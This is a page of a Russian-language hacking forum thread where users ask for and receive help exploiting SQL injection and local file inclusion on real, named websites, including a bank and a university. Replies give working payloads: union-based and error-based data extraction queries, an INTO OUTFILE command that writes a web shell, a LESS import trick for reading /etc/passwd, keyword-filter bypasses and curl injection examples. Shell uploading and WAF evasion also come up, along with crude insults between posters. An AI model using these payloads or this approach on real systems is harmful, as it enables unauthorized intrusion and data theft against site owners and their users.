PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 [11] 12

BabaDook
03.02.2019, 02:51
altblitz said:
↑ (https://antichat.live/posts/4282020/)
Заняться акробатикой желаю с тобой!
Одень свою самую красивую ти-шорточку на плечики нежные.
Тебе ясны указания партай-геноссе Блиц?
Запрыгни ножками стройными ко мне на шею! Быстро, я тебе приказал!
Блиц отжимает 150кг в упражнениях тяж.-атл на спине.
Тебе это понравится, Дюймовочка моя - смотреть на мир с высоты 180см Блиц ))
Пиши есчё, мне нравится твой дерзкий характер!


Совсем ты ебанулся блохастый. Тебя чему гейфтон учил? Прыг под шконку и не мяукай, тебя вызовут ))

altblitz
03.02.2019, 10:31
BabaDook said:
↑ (https://antichat.live/posts/4282021/)
Совсем ты ебанулся блохастый. Тебя чему гейфтон учил? Прыг под шконку и не мяукай, тебя вызовут ))


Фу, пративный мальчуган!

Показал мне свои кулачки нищастные, слабата ебаная в пердело немытое ))

crlf
03.02.2019, 12:16
giloo said:
↑ (https://antichat.live/posts/4281978/)
Подскажите ваши мысли плис! Спасибо!


Если это MySQL, можно предположить скулю в LIMIT. Но если брать последние два пункта наблюдений в расчёт, шансы 50/50.

karkajoi
03.02.2019, 12:43
giloo said:
↑ (https://antichat.live/posts/4281978/)
Всем привет! Есть сайт с возможной sqli.
Как примерно он выглядит:

Code:
https://site.com/search.php?page=1&max=10

Уязвим параметр "max=10", он устанавливает максимальное отображение результатов на странице. Позволяет указывать только 10, 20, 50, 100. Если ввести отличное число от этих, выведет 10 по умолчанию.
Я недавно в сетевой ИБ, а именно SQLI.
Хотелось бы вашей помощи, специалисты)

Code:
https://site.com/search.php?page=1&max=20/**//**//**/

- ТАК ВЫВОДИТ РЕЗУЛЬТАТ

Code:
https://site.com/search.php?page=1&max=20nf4ngfefmweifniwengj

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20'

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20''

(два апострофа) - ОШИБКА

Code:
https://site.com/search.php?page=1&max=20"

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20""

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20/*!"№;%:*"'@#$%^*()*/

- ТАК ВЫВОДИТ РЕЗУЛЬТАТ

Code:
https://site.com/search.php?page=1&max=/**/20

- ОШИБКИ НЕТ, НО ВЫВОДИТ ПО УМОЛЧАНИЮ 10

Code:
https://site.com/search.php?page=1&max=30afnwqwfnn

- ОШИБКИ НЕТ, НО ВЫВОДИТ ПО УМОЛЧАНИЮ 10. Заметила что если ввести отличное от этих (10, 20, 50, 100), то пропускает любые символы без ошибок.

Code:
https://site.com/search.php?page=1&max=20/**/20

- ОШИБКА
Была попытка провести через SQLMap, не увенчалось успехом. WAF нету. Сказал что параметр динамический. level 5. risk не поднимала пока еще. После поста попробую, но плохое предчувствие.
Вывод напрашивается что это все же sqli исходя из того что параметр съедает комментарии. Но познаний мало, и есть мысли что может и не sqli.
Подскажите ваши мысли плис! Спасибо!


а что за ошибка?Подозреваю что там вообще ничего нету в плане sql inj

Тот_самый_Щуп
03.02.2019, 12:48
>Позволяет указывать только 10, 20, 50, 100

Да там int() на переменную походу, но когда это искателей приключений останавливало?

giloo
03.02.2019, 13:18
crlf said:
↑ (https://antichat.live/posts/4282084/)
Если это MySQL, можно предположить скулю в LIMIT. Но если брать последние два пункта наблюдений в расчёт, шансы 50/50.


Я тоже так думала некоторое время, но позволяет только 10, 20, 50, 100. Если был бы LIMIT, то значение было бы гибкое?


karkajoi said:
↑ (https://antichat.live/posts/4282097/)
а что за ошибка?Подозреваю что там вообще ничего нету в плане sql inj


Ошибка 503. Если нет sqli, тогда есть вопрос, есть ли в php обработка комментариев в параметрах?


Gorbachev said:
↑ (https://antichat.live/posts/4282099/)
Да там int() на переменную походу, но когда это искателей приключений останавливало?


Интересно! Как думаете, это на стороне php или sql?

Тот_самый_Щуп
03.02.2019, 13:35
Сложно крутить то, не знаю что.

Для того, чтобы не палить url, сделайте прокси обертку к SQL через какой нибудь веб шелл (осторожно, дома ждет семья), скидывайте, может быть кто поможет вашей беде.

karkajoi
03.02.2019, 14:22
giloo said:
↑ (https://antichat.live/posts/4282108/)
Я тоже так думала некоторое время, но позволяет только 10, 20, 50, 100. Если был бы LIMIT, то значение было бы гибкое?
Ошибка 503. Если нет sqli, тогда есть вопрос, есть ли в php обработка комментариев в параметрах?
Интересно! Как думаете, это на стороне php или sql?


503 это ошибка сервера а не базы данных, тебе надо что-то типо ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near - это уже ошибка базы данных, тут уже можно пробовать провести sqli, но они не всегда включены, тогда уже только руками ли прогами тестить

giloo
03.02.2019, 15:26
karkajoi said:
↑ (https://antichat.live/posts/4282124/)
503 это ошибка сервера а не базы данных, тебе надо что-то типо ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near - это уже ошибка базы данных, тут уже можно пробовать провести sqli, но они не всегда включены, тогда уже только руками ли прогами тестить


На сервере отключены все ошибки, при любой аномалии выдает 503. Как-то была на одном уязвимом сайте, тоже выдавало 503, прошло через слепую инъекцию

giloo
03.02.2019, 15:27
Gorbachev said:
↑ (https://antichat.live/posts/4282111/)
Сложно крутить то, не знаю что.
Для того, чтобы не палить url, сделайте прокси обертку к SQL через какой нибудь веб шелл (осторожно, дома ждет семья), скидывайте, может быть кто поможет вашей беде.


Осталось только допереть как мне это сделаьть) ладно, попробую, идея замечательная

BabaDook
03.02.2019, 15:43
giloo said:
↑ (https://antichat.live/posts/4282140/)
На сервере отключены все ошибки, при любой аномалии выдает 503. Как-то была на одном уязвимом сайте, тоже выдавало 503, прошло через слепую инъекцию


патамцшта ваф рабит. вощем панятна что у тя там нить ничехо, хатя у тя ни все тести сделани тах фто утвирждать ничехо ни буду

giloo
03.02.2019, 20:09
BabaDook said:
↑ (https://antichat.live/posts/4282146/)
патамцшта ваф рабит. вощем панятна что у тя там нить ничехо, хатя у тя ни все тести сделани тах фто утвирждать ничехо ни буду


waf нету, по крайней мере мне так заявил SQLMAP

Sensoft
03.02.2019, 21:33
giloo said:
↑ (https://antichat.live/posts/4282210/)
waf нету, по крайней мере мне так заявил SQLMAP


скинь мне в лс сайт

giloo
04.02.2019, 15:57
giloo said:
↑ (https://antichat.live/posts/4281978/)
Всем привет! Есть сайт с возможной sqli.
Как примерно он выглядит:

Code:
https://site.com/search.php?page=1&max=10

Уязвим параметр "max=10", он устанавливает максимальное отображение результатов на странице. Позволяет указывать только 10, 20, 50, 100. Если ввести отличное число от этих, выведет 10 по умолчанию.
Я недавно в сетевой ИБ, а именно SQLI.
Хотелось бы вашей помощи, специалисты)

Code:
https://site.com/search.php?page=1&max=20/**//**//**/

- ТАК ВЫВОДИТ РЕЗУЛЬТАТ

Code:
https://site.com/search.php?page=1&max=20nf4ngfefmweifniwengj

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20'

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20''

(два апострофа) - ОШИБКА

Code:
https://site.com/search.php?page=1&max=20"

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20""

- ОШИБКА

Code:
https://site.com/search.php?page=1&max=20/*!"№;%:*"'@#$%^*()*/

- ТАК ВЫВОДИТ РЕЗУЛЬТАТ

Code:
https://site.com/search.php?page=1&max=/**/20

- ОШИБКИ НЕТ, НО ВЫВОДИТ ПО УМОЛЧАНИЮ 10

Code:
https://site.com/search.php?page=1&max=30afnwqwfnn

- ОШИБКИ НЕТ, НО ВЫВОДИТ ПО УМОЛЧАНИЮ 10. Заметила что если ввести отличное от этих (10, 20, 50, 100), то пропускает любые символы без ошибок.

Code:
https://site.com/search.php?page=1&max=20/**/20

- ОШИБКА
Была попытка провести через SQLMap, не увенчалось успехом. WAF нету. Сказал что параметр динамический. level 5. risk не поднимала пока еще. После поста попробую, но плохое предчувствие.
Вывод напрашивается что это все же sqli исходя из того что параметр съедает комментарии. Но познаний мало, и есть мысли что может и не sqli.
Подскажите ваши мысли плис! Спасибо!


Похоже что после значения можно поставить ";" "max=10;;;" и запрос обрабатывается корректно. Может ли это говорить о stack query?

karkajoi
04.02.2019, 16:53
giloo said:
↑ (https://antichat.live/posts/4282409/)
Похоже что после значения можно поставить ";" "max=10;;;" и запрос обрабатывается корректно. Может ли это говорить о stack query?


url в лс , так можно вечно гадать

Sensoft
04.02.2019, 17:13
karkajoi said:
↑ (https://antichat.live/posts/4282426/)
url в лс , так можно вечно гадать


Она скинула мне сайт, там клауд, как по мне можно сразу *** забить

BabaDook
04.02.2019, 18:01
Sensoft said:
↑ (https://antichat.live/posts/4282436/)
Она скинула мне сайт, там клауд, как по мне можно сразу *** забить


Так она девушка или нет? Мы тут ради этого собрались тут.


BabaDook said:
↑ (https://antichat.live/posts/4282146/)
патамцшта ваф рабит. вощем панятна что у тя там нить ничехо, хатя у тя ни все тести сделани тах фто утвирждать ничехо ни буду




giloo said:
↑ (https://antichat.live/posts/4282210/)
waf нету, по крайней мере мне так заявил SQLMAP

karkajoi
04.02.2019, 18:02
BabaDook said:
↑ (https://antichat.live/posts/4282446/)
Так она девушка или нет? Мы тут ради этого собрались тут.


А не один хрен? Рептилоид

Sensoft
04.02.2019, 18:32
BabaDook (https://antichat.live/members/263150/) Она наверное не знает что клауд это и есть один из типов waf )

giloo
04.02.2019, 18:50
Sensoft said:
↑ (https://antichat.live/posts/4282457/)
BabaDook (https://antichat.live/members/263150/)
Она наверное не знает что клауд это и есть один из типов waf )


Теперь знаю) я же говорила что недавно в данном направлении

BabaDook
04.02.2019, 18:57
giloo said:
↑ (https://antichat.live/posts/4282462/)
Теперь знаю) я же говорила что недавно в данном направлении


Лучше бы имя своё сказала бы

giloo
05.02.2019, 15:54
Получилось вставить после значения команду PROCEDURE ANALYSE() и запрос прошел. В результате вернуло ~40 строк без полезной информации(

check
05.02.2019, 18:03
edit.php.net/do/getUsageInfos?year=2015 and 1=1%23&csrfToken=[после входа]

-D doc_editor -T checkEntities

смотрю как вывод получить? четыре калонки

karkajoi
05.02.2019, 18:09
check said:
↑ (https://antichat.live/posts/4282664/)
edit.php.net/do/getUsageInfos?year=2015 and 1=1%23&csrfToken=[после входа]
-D doc_editor -T checkEntities
смотрю как вывод получить? четыре калонки


-D doc_editor -T checkEntities --column

-D doc_editor -T checkEntities -C имя интересующий колонки --dump

check
05.02.2019, 18:11
почему unionbased не подключает?

karkajoi
05.02.2019, 18:14
check said:
↑ (https://antichat.live/posts/4282671/)
почему unionbased не подключает?


Я не экстрасенс, надо видеть полную картину

giloo
11.02.2019, 10:05
Всем привет!

Есть запрос:


Code:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 [ЗДЕСЬ ИНЪЕКЦИЯ]

(Error based SQLI)

Подскажите как раскрутить)

procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(

То есть даже не дает 1+1 внутри выполнить

Пробовала еще SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO OUTFILE(version())

Вывело:


Code:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(version())' at line 1

Значит INTO OUTFILEприняло? Есть еще функции по типу outfile для вставки после INTO? Или я вообще не то делаю?)

BabaDook
11.02.2019, 12:32
giloo said:
↑ (https://antichat.live/posts/4283997/)
Всем привет!
Есть запрос:

Code:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 [ЗДЕСЬ ИНЪЕКЦИЯ]

(Error based SQLI)
Подскажите как раскрутить)
procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(
То есть даже не дает 1+1 внутри выполнить
Пробовала еще SELECT id,name FROM cities ORDER BY id LIMIT 0,5
INTO OUTFILE(version())
Вывело:

Code:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(version())' at line 1

Значит
INTO OUTFILE
приняло? Есть еще функции по типу outfile для вставки после INTO? Или я вообще не то делаю?)


Что ты .делаешь?

crlf
11.02.2019, 16:35
giloo said:
↑ (https://antichat.live/posts/4283997/)
Значит
INTO OUTFILE
приняло?


В ошибке явно указано, что нарушен синтаксис. Лучше один раз увидеть, то бишь установить локально MySQL и разобраться в синтаксисе. Или, как минимум, почитать гайды по SQL инъекциям для новичков.

karkajoi
11.02.2019, 17:27
giloo said:
↑ (https://antichat.live/posts/4283997/)
Всем привет!
Есть запрос:

Code:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 [ЗДЕСЬ ИНЪЕКЦИЯ]

(Error based SQLI)
Подскажите как раскрутить)
procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(
То есть даже не дает 1+1 внутри выполнить
Пробовала еще SELECT id,name FROM cities ORDER BY id LIMIT 0,5
INTO OUTFILE(version())
Вывело:

Code:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(version())' at line 1

Значит
INTO OUTFILE
приняло? Есть еще функции по типу outfile для вставки после INTO? Или я вообще не то делаю?)


http://www.securityidiots.com/Web-P...XPATH-Error-Based-Injection-Extractvalue.html (http://www.securityidiots.com/Web-Pentest/SQL-Injection/XPATH-Error-Based-Injection-Extractvalue.html) изучаем, пробуем.

Сразу надо оговорится, что длина вывода не будет превышать 32 символа вроде. Что б вывести все что 32+ символы(хэш например) надо воспользоватся функцией substring(hash,32)

giloo
11.02.2019, 18:38
crlf said:
↑ (https://antichat.live/posts/4284047/)
В ошибке явно указано, что нарушен синтаксис. Лучше один раз увидеть, то бишь установить локально MySQL и разобраться в синтаксисе. Или, как минимум, почитать гайды по SQL инъекциям для новичков.


Гайды перечитаны) уже голова трещит от них(


karkajoi said:
↑ (https://antichat.live/posts/4284057/)
http://www.securityidiots.com/Web-P...XPATH-Error-Based-Injection-Extractvalue.html (http://www.securityidiots.com/Web-Pentest/SQL-Injection/XPATH-Error-Based-Injection-Extractvalue.html)
изучаем, пробуем.
Сразу надо оговорится, что длина вывода не будет превышать 32 символа вроде. Что б вывести все что 32+ символы(хэш например) надо воспользоватся функцией substring(hash,32)


Спасибо! Но вы дали ссылку на входящий параметр до LIMIT.

У меня же можно инъектироваться после ORDER BY id LIMIT 0,5 >

Если я пробую UNION, то выдает ошибку что ORDERне совместим с UNION((

giloo
11.02.2019, 18:50
Нашла еще способ инъекции:

SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO @var1,@var2

Но кроме переменных ничего невозможно вставить(

Так не хочет:

SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO (SELECT 1),@var2

Есть идеи у кого-нибудь?

cat1vo
12.02.2019, 03:26
giloo said:
↑ (https://antichat.live/posts/4284076/)
Нашла еще способ инъекции:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5
INTO @var1,@var2
Но кроме переменных ничего невозможно вставить(

Так не хочет:

SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO (SELECT 1),@var2
Есть идеи у кого-нибудь?


INTO - https://dev.mysql.com/doc/refman/8.0/en/select-into.html


giloo said:
↑ (https://antichat.live/posts/4283997/)
procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(
То есть даже не дает 1+1 внутри выполнить


DoS Bug - https://nvd.nist.gov/vuln/detail/CVE-2015-4870

Он давно пофиксен, подзапросы больше не работают! Можете вывести только, например, название текущей базы данных, версию и текущего пользователя от которого идет подключение!

Если у пользователя есть права на запись в фс пробуйте:


Code:
?q=1 into outfile '/path/to/shell.php' lines terminated by ""--+

?q=1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by ""--+

giloo
12.02.2019, 11:06
cat1vo said:
↑ (https://antichat.live/posts/4284197/)
INTO -
https://dev.mysql.com/doc/refman/8.0/en/select-into.html
DoS Bug -
https://nvd.nist.gov/vuln/detail/CVE-2015-4870
Он давно пофиксен, подзапросы больше не работают! Можете вывести только, например, название текущей базы данных, версию и текущего пользователя от которого идет подключение!
Если у пользователя есть права на запись в фс пробуйте:

Code:
?q=1 into outfile '/path/to/shell.php' lines terminated by ""--+

?q=1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by ""--+



Спасибо! К несчастью сервер экранирует ковычки. А на строку в виде hex ругается... Значит здесь все? Никак нельзя?(

karkajoi
12.02.2019, 15:06
giloo said:
↑ (https://antichat.live/posts/4284229/)
Спасибо! К несчастью сервер экранирует ковычки. А на строку в виде hex ругается... Значит здесь все? Никак нельзя?(


char(), aes_decrypt(aes_encrypt())

hshad
14.02.2019, 13:28
есть инъекция вида


Code:
param=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+ch ar(53);WAITFOR/**/DELAY/**/@x--

как выводить через нее что либо?

и есть ли возможность подружить с мапом как-то?

pinch
17.02.2019, 17:09
есть локальный инклуд позволяющий читать произвольные файлы /style.less?update=e51qf61z&imports[]=../../../../../../../../../../../etc/passwd

проблема в выводе которая ограничивается 6 строками есть идеи как обойти?

altblitz
17.02.2019, 17:16
pinch said:
↑ (https://antichat.live/posts/4286034/)
есть локальный инклуд позволяющий читать произвольные файлы /style.less?update=e51qf61z&imports[]=../../../../../../../../../../../etc/passwd
проблема в выводе которая ограничивается 6 строками есть идеи как обойти?


Возможно, ограничение в вывод 6 строк, заложено изначально в серверном приложении, к которому идёт обращение и обработка скрипта.

pinch
17.02.2019, 17:49
файлы с форматом less нормально читаются /style.less?update=e51qf61z&imports[]=/css/main/themes/default.less а вот с другими парсер выдает ошибку

/* LESS COMPILE ERROR */

/* ParseError: Unexpected input in robots.txt on line 1, column 10

1| User-Agent: *

2|

3| Disallow: /1

4| Disallow: /2

5| Disallow: /3

6| Disallow: /4 */

altblitz
17.02.2019, 19:22
pinch said:
↑ (https://antichat.live/posts/4286051/)
файлы с форматом less нормально читаются /style.less?update=e51qf61z&imports[]=/css/main/themes/default.less а вот с другими парсер выдает ошибку
/* LESS COMPILE ERROR */
/* ParseError: Unexpected input in robots.txt on line 1, column 10
1| User-Agent: *
2|
3| Disallow: /1
4| Disallow: /2
5| Disallow: /3
6| Disallow: /4 */


Строку User-agent, сервер желает видеть не *, а вполне браузерного вида:

Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0, не так ли?

pinch
18.02.2019, 07:32
нет в etc/passwd такая же фигня ParseError: Unexpected input in passwd on line 1, column 15

cat1vo
18.02.2019, 11:46
pinch said:
↑ (https://antichat.live/posts/4286209/)
нет в etc/passwd такая же фигня ParseError: Unexpected input in passwd on line 1, column 15


Ну, 6 строк вывода в ошибке это тоже не плохо. Как вариант, попробуй почитать индексный файл и остальные файлы сайта, очень часто в первых строках идут подключения конфигов и прочих библиотек, возможно прочитав конфиг тебе повезет увидеть в первых 6-ти строках данные для подключения к бд, фтп и тд. (Если конечно эти строки не забитый комментариями разработчиков )

b3
18.02.2019, 12:02
/proc/self/environ если инклуд а не читалка просто. ну или ававатрку залей с кодом если есть возможность

crlf
18.02.2019, 12:19
pinch said:
↑ (https://antichat.live/posts/4286034/)
проблема в выводе которая ограничивается 6 строками есть идеи как обойти?


Не нарушать работу парсера. Если есть возможность как-то закинуть свою нагрузку (пример (https://rdot.org/forum/showthread.php?p=43619)), можно попробовать так:


Code:
/style.less?update=e51qf61z&imports[]=../../../../../../../../../../../tmp/your_cool_file.jpg

Содержимое your_cool_file.jpg:


Code:
@import (inline) "/etc/passwd";

RWD
20.02.2019, 18:13
man474019 said:
↑ (https://antichat.live/posts/4286894/)
Hi friends
Can you help me exploit this sql injection
I tried but no result
Spoiler: sqli link
POST /cabinet HTTP/1.1
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
Referer:
https://ne.birkart.az/
Cookie: PHPSESSID=81d5c3c11f885d5bbe968db124eb5453; uslk_e=ZDQ0NmYyZDAtYzQzZC0yOGQxLTQ1MzItMDRhZWI1YmI 2NzUw~~~~~~~1~; uslk_s=Idle%3B0~~0~0~0~~; __cfduid=d9efd55b42b5016584f8a88876936dbaa15408807 19; __cfduid=d9efd55b42b5016584f8a88876936dbaa15408807 19
Host: ne.birkart.az
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=check&birthday=1
[injection-here]
&cif=1
[injection-here]
Thanks!


https://media1.tenor.com/images/35c9241763c546c36b0507782a5db0b7/tenor.gif?itemid=10584019

have you?

This is really bad idea to run SQLi attack on banking if they didn't ask you to do.

hibar1Xs
21.02.2019, 19:38
Не обойти?


PHP:
$f=stripslashes($_GET['f']);
if(!(strpos($f,'..') ===false) ||strpos('./',$f) !=0||strpos($f,"./") ===false)
{ exit('FALSE'); }

----------------------------------

$_GET['f'] = 'wrapper://'

$w = $_GET['f];

Возможна ли работа враппера с конкатенацией: './'.$w ?

readfile('./'.$_GET['f']);

karkajoi
01.03.2019, 15:40
m0nkrus said:
↑ (https://antichat.live/posts/4288522/)
http://prntscr.com/mqndc1 (https://href.li/?http://prntscr.com/mqndc1)
помогите раскрутить POST
посещалка
http://prntscr.com/mqndmq (https://href.li/?http://prntscr.com/mqndmq)
ссылка такая
https://www.сайт/tbdtdb/result.php


Там все элементарно крутится

targetname=uIyg' union all select null,database(),null,null-- eqew&status=---

targetname=uIyg' union all select 1,2,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),4-- eqew&status=---

и так далее

BenderMR
03.03.2019, 08:05
Помогите раскрутить. Начинает фильтровать, как только FROM появляется в любом виде. Коментил, пробовал что то типа "1,2, .3from". Какие есть варианты обойти это?


Code:
http://onua.edu.ua/index.php?option=com_content&view=article&id=161%20and%20extractvalue(0x0a,concat(0x0a,(sele ct%20database())))--+&Itemid=19&lang=uk

BillyBons
03.03.2019, 11:00
BenderMR said:
↑ (https://antichat.live/posts/4289736/)
Помогите раскрутить. Начинает фильтровать, как только FROM появляется в любом виде. Коментил, пробовал что то типа "1,2, .3from". Какие есть варианты обойти это?

Code:
http://onua.edu.ua/index.php?option=com_content&view=article&id=161%20and%20extractvalue(0x0a,concat(0x0a,(sele ct%20database())))--+&Itemid=19&lang=uk



FRfromOM

L73898UNIT
03.03.2019, 18:11
Сорри, если пишу не туда

WPScan указал версию сайта 4.9.8 и вывел следуюющее:

WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution fixed in version 4.9.9

WordPress

BillyBons
03.03.2019, 18:27
[QUOTE="L73898UNIT"]
L73898UNIT said:
↑ (https://antichat.live/posts/4289880/)
WordPress

crlf
03.03.2019, 23:32
[QUOTE="L73898UNIT"]
L73898UNIT said:
↑ (https://antichat.live/posts/4289880/)
WordPress

giloo
05.03.2019, 17:52
Есть аналоги SELECT?

Нашла уязвимый сайт, вставить можно только PROCEDURE ANALYSE();

Могу достать пользователя, версию, название бд.

Но считать данные из таблиц не могу(

Ругается на "SELECT".

WAF нету!!!!

karkajoi
05.03.2019, 19:30
giloo said:
↑ (https://antichat.live/posts/4290418/)
Есть аналоги SELECT?
Нашла уязвимый сайт, вставить можно только PROCEDURE ANALYSE();
Могу достать пользователя, версию, название бд.
Но считать данные из таблиц не могу(
Ругается на "SELECT".
WAF нету!!!!


Я походу чего то не знаю, но как вытянуть пользователя, версию, название бд без SELECT через PROCEDURE ANALYSE();?

giloo
05.03.2019, 19:49
karkajoi said:
↑ (https://antichat.live/posts/4290437/)
Я походу чего то не знаю, но как вытянуть пользователя, версию, название бд без SELECT через PROCEDURE ANALYSE();?


Через вектор неисполнимого запроса

Error based.

Time based.

updatexml(1,concat(0x3A,benchmark(500000,md5(1))))

karkajoi
05.03.2019, 20:30
А так если по пробовать ?

updatexml(1,concat(0x3A,benchmark(500000,md5(table _name from information_schema.tables limit 1,1))))

giloo
06.03.2019, 11:15
karkajoi said:
↑ (https://antichat.live/posts/4290458/)
А так если по пробовать ?
updatexml(1,concat(0x3A,benchmark(500000,md5(table _name from information_schema.tables limit 1,1))))


А здесь начинает уже ругаться на "FROM".

Причем странно, если я оставляю только table_name или любые другие выражения не совпадающие с синтаксическими, то выходит ошибка:


Unknown column 'table_name' in 'order clause'


Даже если я с исходного запроса(тестирую локально) убираю ORDER BY, ошибка остается прежней. Могу предположить, что PROCEDURE ANALYSE() внутри тела содержит ORDER BY.

giloo
06.03.2019, 11:17
Нашла интересный факт. SELECT, FROM ставить нельзя, но можно "OR" или запятую:

updatexml(1,concat(0x3A,benchmark(500000,md5(1 or 1))))

cat1vo
07.03.2019, 01:05
giloo said:
↑ (https://antichat.live/posts/4290418/)
Есть аналоги SELECT?
Нашла уязвимый сайт, вставить можно только PROCEDURE ANALYSE();
Могу достать пользователя, версию, название бд.
Но считать данные из таблиц не могу(
Ругается на "SELECT".
WAF нету!!!!


Это такой прикол задавать один и тот же вопрос несколько раз (https://antichat.live/threads/424557/page-130/)? Ответ был дан, варианты предоставлены.

BenderMR
18.03.2019, 03:14
Как остановить HTTP 302 на базовую страницу при sql inj в новых версиях firefox. Раньше был NoRedirect, но сейчас его не скачать, пробовал Skip Redirect, но он тоже не дает того результата. Какие есть варианты?

Тот_самый_Щуп
18.03.2019, 04:02
BenderMR said:
↑ (https://antichat.live/posts/4293824/)
Как остановить HTTP 302 на базовую страницу при sql inj в новых версиях firefox. Раньше был NoRedirect, но сейчас его не скачать, пробовал Skip Redirect, но он тоже не дает того результата. Какие есть варианты?


Не крутить иньекты через браузер, крутить через curl.

BenderMR
21.03.2019, 08:39
Gorbachev said:
↑ (https://antichat.live/posts/4293826/)
Не крутить иньекты через браузер, крутить через curl.


Можно пример такой команды увидеть?

Тот_самый_Щуп
21.03.2019, 08:52
BenderMR said:
↑ (https://antichat.live/posts/4294842/)
Можно пример такой команды увидеть?


curl http://target.ru/?id=sql' - пример для GET

curl -d "param1=sql'&param2=value2" -X POST http://target.ru - пример для POST

curl -H "Content-Type: sql'" http://target.ru - пример для заголовков

Если возникнут вопросы, то curl --help, там скрыта истина.

kacergei
26.03.2019, 11:22
Добрый не подскажешь, как обходится подобный Waf?


Code:
pokrishkin.pro/index.php?route=product/search_auto&tab=disc&width=5&diameter=14&et=31&pcd=150&dia=67.1&manufacturer=1%22

Параметр: manufacturer

На двойные кавычки реагирует вызов ошибки

Тот_самый_Щуп
26.03.2019, 11:34
kacergei said:
↑ (https://antichat.live/posts/4296205/)
Добрый не подскажешь, как обходится подобный Waf?

Code:
pokrishkin.pro/index.php?route=product/search_auto&tab=disc&width=5&diameter=14&et=31&pcd=150&dia=67.1&manufacturer=1%22

Параметр: manufacturer
На двойные кавычки реагирует вызов ошибки


Толсто.

Просить раскрутить RU шоп на RU площадке, это пол ачата под цугундер подведешь. А хотя почему нет.

exT1ma4ka
26.03.2019, 18:10
доброго времени суток. sql inj в GET запросе, нужно отправить простую команду:


Code:
SELECT id FROM #__users LIMIT 0,1

проблема, как видно, что название таблицы начинается с решётки #. пытал #__users в HEX, но выдаёт ошибку синтаксиса.

что можно предпринять?

Xsite
26.03.2019, 18:21
exT1ma4ka said:
↑ (https://antichat.live/posts/4296308/)
доброго времени суток. sql inj в GET запросе, нужно отправить простую команду:

Code:
SELECT id FROM #__users LIMIT 0,1

проблема, как видно, что название таблицы начинается с решётки #. пытал #__users в HEX, но выдаёт ошибку синтаксиса.
что можно предпринять?



при помощи мепа тебе поможет тампер --tamper=unionalltounion и все выведет и покажет

ну потом отснифаешь если руками надо

BabaDook
26.03.2019, 19:16
exT1ma4ka said:
↑ (https://antichat.live/posts/4296308/)
доброго времени суток. sql inj в GET запросе, нужно отправить простую команду:

Code:
SELECT id FROM #__users LIMIT 0,1

проблема, как видно, что название таблицы начинается с решётки #. пытал #__users в HEX, но выдаёт ошибку синтаксиса.
что можно предпринять?


%23

exT1ma4ka
26.03.2019, 19:36
BabaDook said:
↑ (https://antichat.live/posts/4296333/)
%23


а бревна и не заметил.. smh

Тот_самый_Щуп
26.03.2019, 20:30
exT1ma4ka said:
↑ (https://antichat.live/posts/4296308/)
доброго времени суток. sql inj в GET запросе, нужно отправить простую команду:

Code:
SELECT id FROM #__users LIMIT 0,1

проблема, как видно, что название таблицы начинается с решётки #. пытал #__users в HEX, но выдаёт ошибку синтаксиса.
что можно предпринять?


Делай так: SELECT id FROM `#__users` LIMIT 0,1

exT1ma4ka
26.03.2019, 20:31
@Gorbachev (https://antichat.live/members/300636/) там кавычки запрещены. но товарищ @BabaDook (https://antichat.live/members/263150/) верно напомнил, проблемы нет более.

Octavian
01.04.2019, 03:02
Есть CRLF хочу выполнить XSS но и за ответа 302 ничего не выходит, что делать?

Jimio
02.04.2019, 00:32
Лью шелл, когда заходишь на него, вводишь пасс, и получаешь пустую страницу или 503 код

WAF? Как можно обойти?

Тот_самый_Щуп
02.04.2019, 01:13
Jimio said:
↑ (https://antichat.live/posts/4297962/)
Лью шелл, когда заходишь на него, вводишь пасс, и получаешь пустую страницу или 503 код
WAF? Как можно обойти?


Частенько такие траблы из за упаковки шелла, пробуйте другие шеллы, античат одобряе

crlf
02.04.2019, 08:54
Octavian said:
↑ (https://antichat.live/posts/4297716/)
Есть CRLF хочу выполнить XSS но и за ответа 302 ничего не выходит, что делать?


Действовать нужно в зависимости от места внедрения. Если выше стоит легитимный Location, то известных способов в паблике нет. Бывают различные контексты и в зависимости от бекенда попадаются варианты с возможностью обхода, но нужно ресёчить. Как вариант, если ещё не видел, ознакомиться с этим райтапом https://habr.com/ru/company/pt/blog/247709/.


Jimio said:
↑ (https://antichat.live/posts/4297962/)
